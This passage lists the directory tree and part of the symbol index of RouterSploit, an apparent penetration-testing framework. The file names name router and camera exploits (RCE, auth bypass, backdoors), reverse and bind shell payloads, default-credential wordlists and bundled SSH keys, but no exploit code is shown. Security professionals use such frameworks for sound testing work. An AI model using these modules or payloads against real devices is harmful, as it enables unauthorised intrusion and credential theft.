│ │ │ │ ├── dir_300_320_600_615_info_disclosure.py
│ │ │ │ ├── dir_300_320_615_auth_bypass.py
│ │ │ │ ├── dir_300_600_rce.py
│ │ │ │ ├── dir_300_645_815_upnp_rce.py
│ │ │ │ ├── dir_645_815_rce.py
│ │ │ │ ├── dir_645_password_disclosure.py
│ │ │ │ ├── dir_655_866_652_rce.py
│ │ │ │ ├── dir_815_850l_rce.py
│ │ │ │ ├── dir_825_path_traversal.py
│ │ │ │ ├── dir_850l_creds_disclosure.py
│ │ │ │ ├── dir_8xx_password_disclosure.py
│ │ │ │ ├── dns_320l_327l_rce.py
│ │ │ │ ├── dsl_2640b_dns_change.py
│ │ │ │ ├── dsl_2730_2750_path_traversal.py
│ │ │ │ ├── dsl_2730b_2780b_526b_dns_change.py
│ │ │ │ ├── dsl_2740r_dns_change.py
│ │ │ │ ├── dsl_2750b_info_disclosure.py
│ │ │ │ ├── dsl_2750b_rce.py
│ │ │ │ ├── dsp_w110_rce.py
│ │ │ │ ├── dvg_n5402sp_path_traversal.py
│ │ │ │ ├── dwl_3200ap_password_disclosure.py
│ │ │ │ ├── dwr_932_info_disclosure.py
│ │ │ │ ├── dwr_932b_backdoor.py
│ │ │ │ ├── multi_hedwig_cgi_exec.py
│ │ │ │ └── multi_hnap_rce.py
│ │ │ ├── fortinet/
│ │ │ │ ├── __init__.py
│ │ │ │ └── fortigate_os_backdoor.py
│ │ │ ├── huawei/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── e5331_mifi_info_disclosure.py
│ │ │ │ ├── hg520_info_disclosure.py
│ │ │ │ ├── hg530_hg520b_password_disclosure.py
│ │ │ │ ├── hg532_rce.py
│ │ │ │ └── hg866_password_change.py
│ │ │ ├── ipfire/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ipfire_oinkcode_rce.py
│ │ │ │ ├── ipfire_proxy_rce.py
│ │ │ │ └── ipfire_shellshock.py
│ │ │ ├── lg/
│ │ │ │ ├── __init__.py
│ │ │ │ └── nas_3718.py
│ │ │ ├── linksys/
│ │ │ │ ├── 1500_2500_rce.py
│ │ │ │ ├── __init__.py
│ │ │ │ ├── eseries_themoon_rce.py
│ │ │ │ ├── smartwifi_password_disclosure.py
│ │ │ │ ├── wap54gv3_rce.py
│ │ │ │ └── wrt100_110_rce.py
│ │ │ ├── mikrotik/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── routeros_jailbreak.py
│ │ │ │ └── winbox_auth_bypass_creds_disclosure.py
│ │ │ ├── movistar/
│ │ │ │ ├── __init__.py
│ │ │ │ └── adsl_router_bhs_rta_path_traversal.py
│ │ │ ├── multi/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── gpon_home_gateway_rce.py
│ │ │ │ ├── misfortune_cookie.py
│ │ │ │ ├── rom0.py
│ │ │ │ ├── tcp_32764_info_disclosure.py
│ │ │ │ └── tcp_32764_rce.py
│ │ │ ├── netcore/
│ │ │ │ ├── __init__.py
│ │ │ │ └── udp_53413_rce.py
│ │ │ ├── netgear/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── dgn2200_dnslookup_cgi_rce.py
│ │ │ │ ├── dgn2200_ping_cgi_rce.py
│ │ │ │ ├── jnr1010_path_traversal.py
│ │ │ │ ├── multi_password_disclosure-2017-5521.py
│ │ │ │ ├── multi_rce.py
│ │ │ │ ├── n300_auth_bypass.py
│ │ │ │ ├── prosafe_rce.py
│ │ │ │ ├── r7000_r6400_rce.py
│ │ │ │ ├── rax30_rce.py
│ │ │ │ └── wnr500_612v3_jnr1010_2010_path_traversal.py
│ │ │ ├── netsys/
│ │ │ │ ├── __init__.py
│ │ │ │ └── multi_rce.py
│ │ │ ├── shuttle/
│ │ │ │ ├── 915wm_dns_change.py
│ │ │ │ └── __init__.py
│ │ │ ├── technicolor/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── dwg855_authbypass.py
│ │ │ │ ├── tc7200_password_disclosure.py
│ │ │ │ ├── tc7200_password_disclosure_v2.py
│ │ │ │ └── tg784_authbypass.py
│ │ │ ├── thomson/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── twg849_info_disclosure.py
│ │ │ │ └── twg850_password_disclosure.py
│ │ │ ├── tplink/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── archer_c2_c20i_rce.py
│ │ │ │ ├── archer_c9_admin_password_reset.py
│ │ │ │ ├── wdr740nd_wdr740n_backdoor.py
│ │ │ │ ├── wdr740nd_wdr740n_path_traversal.py
│ │ │ │ └── wdr842nd_wdr842n_configure_disclosure.py
│ │ │ ├── ubiquiti/
│ │ │ │ ├── __init__.py
│ │ │ │ └── airos_6_x.py
│ │ │ ├── zte/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── f460_f660_backdoor.py
│ │ │ │ ├── zxhn_h108n_wifi_password_disclosure.py
│ │ │ │ └── zxv10_rce.py
│ │ │ └── zyxel/
│ │ │ ├── __init__.py
│ │ │ ├── d1000_rce.py
│ │ │ ├── d1000_wifi_password_disclosure.py
│ │ │ ├── p660hn_t_v1_rce.py
│ │ │ ├── p660hn_t_v2_rce.py
│ │ │ └── zywall_usg_extract_hashes.py
│ │ ├── generic/
│ │ │ ├── __init__.py
│ │ │ ├── bluetooth/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── btle_enumerate.py
│ │ │ │ ├── btle_scan.py
│ │ │ │ └── btle_write.py
│ │ │ └── upnp/
│ │ │ ├── __init__.py
│ │ │ └── ssdp_msearch.py
│ │ ├── payloads/
│ │ │ ├── __init__.py
│ │ │ ├── armle/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── bind_tcp.py
│ │ │ │ └── reverse_tcp.py
│ │ │ ├── cmd/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── awk_bind_tcp.py
│ │ │ │ ├── awk_bind_udp.py
│ │ │ │ ├── awk_reverse_tcp.py
│ │ │ │ ├── bash_reverse_tcp.py
│ │ │ │ ├── netcat_bind_tcp.py
│ │ │ │ ├── netcat_reverse_tcp.py
│ │ │ │ ├── perl_bind_tcp.py
│ │ │ │ ├── perl_reverse_tcp.py
│ │ │ │ ├── php_bind_tcp.py
│ │ │ │ ├── php_reverse_tcp.py
│ │ │ │ ├── python_bind_tcp.py
│ │ │ │ ├── python_bind_udp.py
│ │ │ │ ├── python_reverse_tcp.py
│ │ │ │ └── python_reverse_udp.py
│ │ │ ├── mipsbe/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── bind_tcp.py
│ │ │ │ └── reverse_tcp.py
│ │ │ ├── mipsle/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── bind_tcp.py
│ │ │ │ └── reverse_tcp.py
│ │ │ ├── perl/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── bind_tcp.py
│ │ │ │ └── reverse_tcp.py
│ │ │ ├── php/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── bind_tcp.py
│ │ │ │ └── reverse_tcp.py
│ │ │ ├── python/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── bind_tcp.py
│ │ │ │ ├── bind_udp.py
│ │ │ │ ├── reverse_tcp.py
│ │ │ │ └── reverse_udp.py
│ │ │ ├── x64/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── bind_tcp.py
│ │ │ │ └── reverse_tcp.py
│ │ │ └── x86/
│ │ │ ├── __init__.py
│ │ │ ├── bind_tcp.py
│ │ │ └── reverse_tcp.py
│ │ └── scanners/
│ │ ├── __init__.py
│ │ ├── autopwn.py
│ │ ├── cameras/
│ │ │ ├── __init__.py
│ │ │ └── camera_scan.py
│ │ ├── misc/
│ │ │ ├── __init__.py
│ │ │ └── misc_scan.py
│ │ └── routers/
│ │ ├── __init__.py
│ │ └── router_scan.py
│ └── resources/
│ ├── __init__.py
│ ├── ssh_keys/
│ │ ├── array-networks-vapv-vxag.json
│ │ ├── array-networks-vapv-vxag.key
│ │ ├── barracuda_load_balancer_vm.json
│ │ ├── barracuda_load_balancer_vm.key
│ │ ├── ceragon-fibeair-cve-2015-0936.json
│ │ ├── ceragon-fibeair-cve-2015-0936.key
│ │ ├── exagrid-cve-2016-1561.json
│ │ ├── exagrid-cve-2016-1561.key
│ │ ├── f5-bigip-cve-2012-1493.json
│ │ ├── f5-bigip-cve-2012-1493.key
│ │ ├── loadbalancer.org-enterprise-va.json
│ │ ├── loadbalancer.org-enterprise-va.key
│ │ ├── monroe-dasdec-cve-2013-0137.json
│ │ ├── monroe-dasdec-cve-2013-0137.key
│ │ ├── quantum-dxi-v1000.json
│ │ ├── quantum-dxi-v1000.key
│ │ ├── vagrant.json
│ │ └── vagrant.key
│ └── wordlists/
│ ├── __init__.py
│ ├── defaults.txt
│ ├── passwords.txt
│ ├── snmp.txt
│ └── usernames.txt
├── rsf.py
├── setup.py
└── tests/
├── __init__.py
├── conftest.py
├── core/
│ ├── __init__.py
│ └── test_option.py
├── creds/
│ ├── __init__.py
│ ├── cameras/
│ │ ├── __init__.py
│ │ ├── acti/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ ├── test_telnet_default_creds.py
│ │ │ └── test_webinterface_default_creds.py
│ │ ├── american_dynamics/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ └── test_telnet_default_creds.py
│ │ ├── arecont/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ └── test_telnet_default_creds.py
│ │ ├── avigilon/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ └── test_telnet_default_creds.py
│ │ ├── avtech/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ └── test_telnet_default_creds.py
│ │ ├── axis/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ ├── test_telnet_default_creds.py
│ │ │ └── test_webinterface_http_auth_default_creds.py
│ │ ├── basler/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ ├── test_telnet_default_creds.py
│ │ │ └── test_webinterface_default_creds.py
│ │ ├── brickcom/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ ├── test_telnet_default_creds.py
│ │ │ └── test_webinterface_http_auth_default_creds.py
│ │ ├── canon/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ ├── test_telnet_default_creds.py
│ │ │ └── test_webinterface_default_creds.py
│ │ ├── cisco/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ └── test_telnet_default_creds.py
│ │ ├── dlink/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ └── test_telnet_default_creds.py
│ │ ├── geovision/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ └── test_telnet_default_creds.py
│ │ ├── grandstream/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ └── test_telnet_default_creds.py
│ │ ├── hikvision/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ └── test_telnet_default_creds.py
│ │ ├── honeywell/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ └── test_telnet_default_creds.py
│ │ ├── iqinvision/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ └── test_telnet_default_creds.py
│ │ ├── jvc/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ └── test_telnet_default_creds.py
│ │ ├── mobotix/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ └── test_telnet_default_creds.py
│ │ ├── samsung/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ └── test_telnet_default_creds.py
│ │ ├── sentry360/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ └── test_telnet_default_creds.py
│ │ ├── siemens/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ └── test_telnet_default_creds.py
│ │ ├── speco/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ └── test_telnet_default_creds.py
│ │ ├── stardot/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ └── test_telnet_default_creds.py
│ │ ├── vacron/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ └── test_telnet_default_creds.py
│ │ └── videoiq/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── generic/
│ │ ├── test_ftp_bruteforce.py
│ │ ├── test_ftp_default.py
│ │ ├── test_http_basic_digest_bruteforce.py
│ │ ├── test_http_basic_digest_default.py
│ │ ├── test_snmp_bruteforce.py
│ │ ├── test_ssh_bruteforce.py
│ │ ├── test_ssh_default.py
│ │ ├── test_telnet_bruteforce.py
│ │ └── test_telnet_default.py
│ └── routers/
│ ├── 2wire/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── 3com/
│ │ ├── __init__.py
│ │ ├── test_3com_ftp_default_creds.py
│ │ ├── test_3com_ssh_default_creds.py
│ │ └── test_3com_telnet_default_creds.py
│ ├── __init__.py
│ ├── asmax/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ ├── test_telnet_default_creds.py
│ │ └── test_webinterface_http_auth_default_creds.py
│ ├── asus/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── belkin/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── bhu/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── billion/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── cisco/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── comtrend/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── dlink/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── fortinet/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── huawei/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── ipfire/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── juniper/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── linksys/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── mikrotik/
│ │ ├── __init__.py
│ │ ├── test_api_ros_default_creds.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── movistar/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── netcore/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── netgear/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── netsys/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── pfsense/
│ │ ├── __init__.py
│ │ └── test_ssh_default_creds.py
│ ├── technicolor/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── thomson/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── tplink/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── ubiquiti/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── zte/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ └── zyxel/
│ ├── __init__.py
│ ├── test_ftp_default_creds.py
│ ├── test_ssh_default_creds.py
│ └── test_telnet_default_creds.py
├── encoders/
│ ├── __init__.py
│ ├── perl/
│ │ ├── __init__.py
│ │ ├── test_base64.py
│ │ └── test_hex.py
│ ├── php/
│ │ ├── __init__.py
│ │ ├── test_base64.py
│ │ └── test_hex.py
│ └── python/
│ ├── __init__.py
│ ├── test_base64.py
│ └── test_hex.py
├── exploits/
│ ├── __init__.py
│ ├── cameras/
│ │ ├── __init__.py
│ │ ├── avigilon/
│ │ │ ├── __init__.py
│ │ │ └── test_videoiq_camera_path_traversal.py
│ │ ├── brickcom/
│ │ │ ├── __init__.py
│ │ │ ├── test_corp_network_cameras_conf_disclosure.py
│ │ │ └── test_users_cgi_creds_disclosure.py
│ │ ├── cisco/
│ │ │ ├── __init__.py
│ │ │ └── test_video_surv_path_traversal.py
│ │ ├── dlink/
│ │ │ ├── __init__.py
│ │ │ └── test_dcs_930l_932l_auth_bypass.py
│ │ ├── honeywell/
│ │ │ ├── __init__.py
│ │ │ └── test_hicc_1100pt_password_disclosure.py
│ │ ├── jovision/
│ │ │ ├── __init__.py
│ │ │ └── test_jovision_camera_credential_disclosure.py
│ │ ├── multi/
│ │ │ ├── __init__.py
│ │ │ ├── test_cctv_dvr_rce.py
│ │ │ ├── test_dvr_creds_disclosure.py
│ │ │ ├── test_jvc_vanderbilt_honeywell_path_traversal.py
│ │ │ └── test_netwave_ip_camera_information_disclosure.py
│ │ ├── mvpower/
│ │ │ ├── __init__.py
│ │ │ └── test_dvr_jaws_rce.py
│ │ ├── siemens/
│ │ │ ├── __init__.py
│ │ │ └── test_cvms2025_credentials_disclosure.py
│ │ └── xiongmai/
│ │ ├── __init__.py
│ │ └── test_uc_httpd_path_traversal.py
│ ├── misc/
│ │ ├── __init__.py
│ │ ├── asus/
│ │ │ └── test_b1m_projector_rce.py
│ │ ├── miele/
│ │ │ ├── __init__.py
│ │ │ └── test_pg8528_path_traversal.py
│ │ └── wepresent/
│ │ ├── __init__.py
│ │ └── test_wipg1000_rce.py
│ └── routers/
│ ├── 2wire/
│ │ ├── __init__.py
│ │ ├── test_4011g_5012nv_path_traversal.py
│ │ └── test_gateway_auth_bypass.py
│ ├── 3com/
│ │ ├── __init__.py
│ │ ├── test_ap8760_password_disclosure.py
│ │ ├── test_imc_info_disclosure.py
│ │ ├── test_imc_path_traversal.py
│ │ ├── test_officeconnect_info_disclosure.py
│ │ └── test_officeconnect_rce.py
│ ├── __init__.py
│ ├── asmax/
│ │ ├── __init__.py
│ │ ├── test_ar_1004g_password_disclosure.py
│ │ └── test_ar_804_gu_rce.py
│ ├── asus/
│ │ ├── __init__.py
│ │ ├── test_asuswrt_lan_rce.py
│ │ ├── test_infosvr_backdoor_rce.py
│ │ └── test_rt_n16_password_disclosure.py
│ ├── belkin/
│ │ ├── __init__.py
│ │ ├── test_auth_bypass.py
│ │ ├── test_g_n150_password_disclosure.py
│ │ ├── test_g_plus_info_disclosure.py
│ │ ├── test_n150_path_traversal.py
│ │ ├── test_n750_rce.py
│ │ └── test_play_mac_prce.py
│ ├── bhu/
│ │ ├── __init__.py
│ │ └── test_bhu_urouter_rce.py
│ ├── billion/
│ │ ├── __init__.py
│ │ ├── test_billion_5200w_rce.py
│ │ └── test_billion_7700n4_password_disclosure.py
│ ├── cisco/
│ │ ├── __init__.py
│ │ ├── test_dpc2420_info_disclosure.py
│ │ ├── test_firepower_management60_path_traversal.py
│ │ ├── test_firepower_management60_rce.py
│ │ ├── test_ios_http_authorization_bypass.py
│ │ ├── test_rv320_command_injection.py
│ │ ├── test_secure_acs_bypass.py
│ │ ├── test_ucm_info_disclosure.py
│ │ ├── test_ucs_manager_rce.py
│ │ └── test_unified_multi_path_traversal.py
│ ├── comtrend/
│ │ ├── __init__.py
│ │ └── test_ct_5361t_password_disclosure.py
│ ├── dlink/
│ │ ├── __init__.py
│ │ ├── test_dcs_930l_auth_rce.py
│ │ ├── test_dir_300_320_600_615_info_disclosure.py
│ │ ├── test_dir_300_320_615_auth_bypass.py
│ │ ├── test_dir_300_600_rce.py
│ │ ├── test_dir_300_645_815_upnp_rce.py
│ │ ├── test_dir_645_815_rce.py
│ │ ├── test_dir_645_password_disclosure.py
│ │ ├── test_dir_655_866_652_rce.py
│ │ ├── test_dir_815_850l_rce.py
│ │ ├── test_dir_825_path_traversal.py
│ │ ├── test_dir_850l_creds_disclosure.py
│ │ ├── test_dir_8xx_password_disclosure.py
│ │ ├── test_dns_320l_327l_rce.py
│ │ ├── test_dsl_2730_2750_path_traversal.py
│ │ ├── test_dsl_2730b_2780b_526b_dns_change.py
│ │ ├── test_dsl_2750b_info_disclosure.py
│ │ ├── test_dsl_2750b_rce.py
│ │ ├── test_dsp_w110_rce.py
│ │ ├── test_dvg_n5402sp_path_traversal.py
│ │ ├── test_dwl_3200ap_password_disclosure.py
│ │ ├── test_dwr_932_info_disclosure.py
│ │ ├── test_dwr_932b_backdoor.py
│ │ ├── test_multi_hedwig_cgi_exec.py
│ │ └── test_multi_hnap_rce.py
│ ├── huawei/
│ │ ├── __init__.py
│ │ ├── test_e5331_mifi_info_disclosure.py
│ │ ├── test_hg520_info_disclosure.py
│ │ ├── test_hg530_hg520b_password_disclosure.py
│ │ └── test_hg866_password_change.py
│ ├── ipfire/
│ │ ├── __init__.py
│ │ ├── test_ipfire_proxy_rce.py
│ │ └── test_ipfire_shellshock.py
│ ├── linksys/
│ │ ├── __init__.py
│ │ ├── test_1500_2500_rce.py
│ │ ├── test_eseries_themoon_rce.py
│ │ ├── test_smartwifi_password_disclosure.py
│ │ ├── test_wap54gv3_rce.py
│ │ └── test_wrt100_110_rce.py
│ ├── mikrotik/
│ │ ├── __init__.py
│ │ └── test_winbox_auth_bypass_creds_disclosure.py
│ ├── movistar/
│ │ ├── __init__.py
│ │ └── test_adsl_router_bhs_rta_path_traversal.py
│ ├── multi/
│ │ ├── __init__.py
│ │ ├── test_gpon_home_gateway_rce.py
│ │ ├── test_misfortune_cookie.py
│ │ ├── test_rom0.py
│ │ ├── test_tcp_32764_info_disclosure.py
│ │ └── test_tcp_32764_rce.py
│ ├── netcore/
│ │ ├── __init__.py
│ │ └── test_udp_53413_rce.py
│ ├── netgear/
│ │ ├── __init__.py
│ │ ├── test_dgn2200_ping_cgi_rce.py
│ │ ├── test_jnr1010_path_traversal.py
│ │ ├── test_n300_auth_bypass.py
│ │ ├── test_netgear_multi_rce.py
│ │ ├── test_prosafe_rce.py
│ │ ├── test_r7000_r6400_rce.py
│ │ └── test_wnr500_612v3_jnr1010_2010_path_traversal.py
│ ├── netsys/
│ │ ├── __init__.py
│ │ └── test_multi_rce.py
│ ├── shuttle/
│ │ ├── __init__.py
│ │ └── test_915wm_dns_change.py
│ ├── technicolor/
│ │ ├── __init__.py
│ │ ├── test_dwg855_authbypass.py
│ │ ├── test_tc7200_password_disclosure.py
│ │ ├── test_tc7200_password_disclosure_v2.py
│ │ └── test_tg784_authbypass.py
│ ├── thomson/
│ │ ├── __init__.py
│ │ └── test_twg850_password_disclosure.py
│ ├── tplink/
│ │ ├── __init__.py
│ │ ├── test_archer_c2_c20i_rce.py
│ │ ├── test_wdr740nd_wdr740n_backdoor.py
│ │ ├── test_wdr740nd_wdr740n_path_traversal.py
│ │ └── test_wdr842nd_wdr842n_configure_disclosure.py
│ ├── zte/
│ │ ├── __init__.py
│ │ ├── test_f460_f660_backdoor.py
│ │ ├── test_zxhn_h108n_wifi_password_disclosure.py
│ │ └── test_zxv10_rce.py
│ └── zyxel/
│ ├── __init__.py
│ ├── test_d1000_rce.py
│ ├── test_d1000_wifi_password_disclosure.py
│ ├── test_p660hn_t_v1_rce.py
│ ├── test_p660hn_t_v2_rce.py
│ └── test_zywall_usg_extract_hashes.py
├── generic/
│ ├── __init__.py
│ └── upnp/
│ └── test_ssdp_msearch.py
├── payloads/
│ ├── __init__.py
│ ├── armle/
│ │ ├── __init__.py
│ │ ├── test_bind_tcp.py
│ │ └── test_reverse_tcp.py
│ ├── cmd/
│ │ ├── __init__.py
│ │ ├── test_awk_bind_tcp.py
│ │ ├── test_awk_bind_udp.py
│ │ ├── test_awk_reverse_tcp.py
│ │ ├── test_bash_reverse_tcp.py
│ │ ├── test_netcat_bind_tcp.py
│ │ ├── test_netcat_reverse_tcp.py
│ │ ├── test_perl_bind_tcp.py
│ │ ├── test_perl_reverse_tcp.py
│ │ ├── test_php_bind_tcp.py
│ │ ├── test_php_reverse_tcp.py
│ │ ├── test_python_bind_tcp.py
│ │ ├── test_python_bind_udp.py
│ │ ├── test_python_reverse_tcp.py
│ │ └── test_python_reverse_udp.py
│ ├── mipsbe/
│ │ ├── __init__.py
│ │ ├── test_bind_tcp.py
│ │ └── test_reverse_tcp.py
│ ├── mipsle/
│ │ ├── __init__.py
│ │ ├── test_bind_tcp.py
│ │ └── test_reverse_tcp.py
│ ├── perl/
│ │ ├── test_bind_tcp.py
│ │ └── test_reverse_tcp.py
│ ├── php/
│ │ ├── __init__.py
│ │ ├── test_bind_tcp.py
│ │ └── test_reverse_tcp.py
│ ├── python/
│ │ ├── __init__.py
│ │ ├── test_bind_tcp.py
│ │ ├── test_bind_udp.py
│ │ ├── test_reverse_tcp.py
│ │ └── test_reverse_udp.py
│ ├── x64/
│ │ ├── __init__.py
│ │ ├── test_bind_tcp.py
│ │ └── test_reverse_tcp.py
│ └── x86/
│ ├── __init__.py
│ ├── test_bind_tcp.py
│ └── test_reverse_tcp.py
├── test_exploit_scenarios.py
└── test_module_info.py
SYMBOL INDEX (1615 symbols across 712 files)
FILE: routersploit/core/bluetooth/btle/btle_device.py
class Device (line 21) | class Device(ScanEntry):
method __init__ (line 24) | def __init__(self, addr, iface):
method _update (line 30) | def _update(self, resp):
method print_info (line 41) | def print_info(self):
method print_services (line 58) | def print_services(self):
method enumerate_services (line 65) | def enumerate_services(self):
method write (line 109) | def write(self, characteristic, data):
method _get_data (line 156) | def _get_data(self, scan_data):
method _get_flags (line 173) | def _get_flags(self, data):
method _is_bit_set (line 194) | def _is_bit_set(self, byteval, idx):
method _get_svc_description (line 197) | def _get_svc_description(self, service):
method _get_char_description (line 205) | def _get_char_description(self, char):
method _get_char (line 212) | def _get_char(self, char, props):
method _get_appearance (line 231) | def _get_appearance(self, data):
FILE: routersploit/core/bluetooth/btle/btle_scanner.py
class BTLEScanner (line 7) | class BTLEScanner(Scanner):
method __init__ (line 10) | def __init__(self, mac=None, iface=0):
method _decode_address (line 14) | def _decode_address(self, resp):
method _find_or_create (line 18) | def _find_or_create(self, addr):
method process (line 27) | def process(self, timeout=10.0):
class ScanDelegate (line 63) | class ScanDelegate(DefaultDelegate):
method __init__ (line 64) | def __init__(self, options):
method handleDiscovery (line 68) | def handleDiscovery(self, dev, isNewDev, isNewData):
FILE: routersploit/core/bluetooth/btle_client.py
class Options (line 13) | class Options:
method __init__ (line 16) | def __init__(self, buffering, mac, enum_services):
class BTLEClient (line 22) | class BTLEClient(Exploit):
method btle_scan (line 29) | def btle_scan(self, mac=None):
FILE: routersploit/core/exploit/encoders.py
class BaseEncoder (line 5) | class BaseEncoder(BaseExploit):
method __init__ (line 8) | def __init__(self):
method encode (line 11) | def encode(self):
